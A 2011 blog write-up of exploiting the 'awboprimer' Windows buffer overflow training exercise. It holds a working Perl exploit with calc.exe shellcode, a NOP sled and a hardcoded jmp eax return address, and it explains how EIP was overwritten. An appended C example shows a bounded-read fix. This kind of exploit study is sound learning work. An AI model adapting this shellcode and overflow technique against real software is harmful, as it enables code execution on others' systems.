Friday, July 1, 2011

Advanced Windows Buffer Overflows: awboprimer

Thanks to Joel Esler of VRT for helping me get on the right track, environment wise.

If a just-in-time debugger hasn't been configured, the int 3 instruction (a software breakpoint that traps into the debugger) prevents the executable from running from a cmd.exe shell.

Configuring Immunity Debugger as the just-in-time debugger via the Win2k Registry:

Under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug

set the "Debugger" value to

"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" -AEDEBUG %ld %ld

I used hexedit to change the 0xCC instruction to a 0x90 so that I could run it without the debugger kicking in.

awboprimer. My introduction to buffer overflows on Windows.
#!/usr/bin/perl

# Payload that spawns calc.exe (resolved via the PEB export walk below).
$shellcode = "\x81\xec\x00\x01\x00\x00\xfc\xe8\x44\x00\x00" .
"\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

$header = "AAAx";                    # buffer[3] must be 'x' or main() calls exit()
$nops = "\x90" x 20;                 # NOP sled to absorb instruction alignment
$eip = "\xf4\x55\xed\x77";           # jmp eax (EAX points at the start of the gets() buffer)
$filler = "A" x (256-length($shellcode)-length($nops));   # pad out the 256-byte buffer

# 4 + 20 + shellcode + filler + 4 = 264 bytes, landing $eip on the saved return address.
print $header . $nops . $shellcode . $filler . $eip;

main() declares a 256-byte buffer on the stack, then calls gets(). If buffer[3] does not equal 'x', exit() is called, preventing a return from main.

264 bytes of input lets me overwrite EIP.

When main returns, ESP points to right after where main's saved EIP was. I thought I could place the shellcode here and overwrite EIP with a JMP ESP address to get there, but there wasn't enough space for the shellcode.

Looking at the other registers, EAX points to the beginning of the gets() buffer. Fortunately, the "AAAx" header turned into NOP instructions and there was enough space to put all the shellcode.

The NOPs before the shellcode were added to fix some instruction alignment issues when the shellcode executes.
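The root cause of the overflow above is the unbounded gets() call into the 256-byte stack buffer. The following C program is an added example, not code from the post or the awboprimer binary: it reconstructs the input-handling pattern the post describes (a 256-byte buffer and a check that buffer[3] is 'x') with a bounded read in place of gets(), and uses a sentinel field placed after the buffer to show that an over-long line of the same 264-byte length no longer reaches past the buffer. The function names, the sentinel value and the constructed input lines are all assumptions made for this example; a real program would call fgets(buf, sizeof buf, stdin) and apply the same length check.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SIZE 256   /* same buffer size the post describes */

/* Result of a bounded read: bytes stored, and whether the line was too long
 * to fit, which is exactly the condition the overflow relies on. */
struct read_result {
    size_t stored;
    bool truncated;
};

/* Hardened replacement for the gets() call (hypothetical name). Reads from an
 * in-memory line so it runs offline; never writes more than BUF_SIZE - 1 bytes
 * plus a terminator into buf, whatever the length of the input. */
struct read_result bounded_read(const char *line, char buf[BUF_SIZE]) {
    struct read_result r = {0, false};
    size_t n = strlen(line);
    if (n >= BUF_SIZE) {
        r.truncated = true;
        n = BUF_SIZE - 1;          /* keep what fits, flag the rest */
    }
    memcpy(buf, line, n);
    buf[n] = '\0';
    r.stored = n;
    return r;
}

/* The post's magic-byte check (buffer[3] must be 'x'), reached only after a
 * bounded read; over-long input is refused before any byte of it is used. */
bool accept_input(const char *line, char buf[BUF_SIZE]) {
    struct read_result r = bounded_read(line, buf);
    if (r.truncated) return false;
    if (r.stored < 4 || buf[3] != 'x') return false;
    return true;
}

/* Builds a constructed test line: len bytes of 'A' with byte 3 set to fourth,
 * mirroring the "AAAx" header followed by filler. out must hold len + 1 bytes. */
void make_line(char *out, size_t len, char fourth) {
    memset(out, 'A', len);
    if (len > 3) out[3] = fourth;
    out[len] = '\0';
}

/* Stands in for the stack frame: a sentinel stored right after the buffer
 * plays the role of the saved EBP/EIP. Returns true if the sentinel survived
 * the read, i.e. nothing was written beyond the buffer. */
bool frame_intact_after(const char *line) {
    struct {
        char buf[BUF_SIZE];
        unsigned int sentinel;      /* constructed marker, not a real saved EIP */
    } frame;
    frame.sentinel = 0xDEADBEEFu;
    (void)accept_input(line, frame.buf);
    return frame.sentinel == 0xDEADBEEFu;
}

int main(void) {
    char line[300];
    char buf[BUF_SIZE];

    make_line(line, 264, 'x');      /* same length as the post's payload */
    printf("264-byte line accepted: %d, frame intact: %d\n",
           accept_input(line, buf), frame_intact_after(line));

    make_line(line, 200, 'x');      /* ordinary input that fits */
    printf("200-byte line accepted: %d, frame intact: %d\n",
           accept_input(line, buf), frame_intact_after(line));
    return 0;
}
```

The bounded read turns the length problem into a return value the caller must handle; the sentinel check is only a teaching device for this example, whereas a real build would rely on stack cookies, DEP and ASLR in addition to the bounded read.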
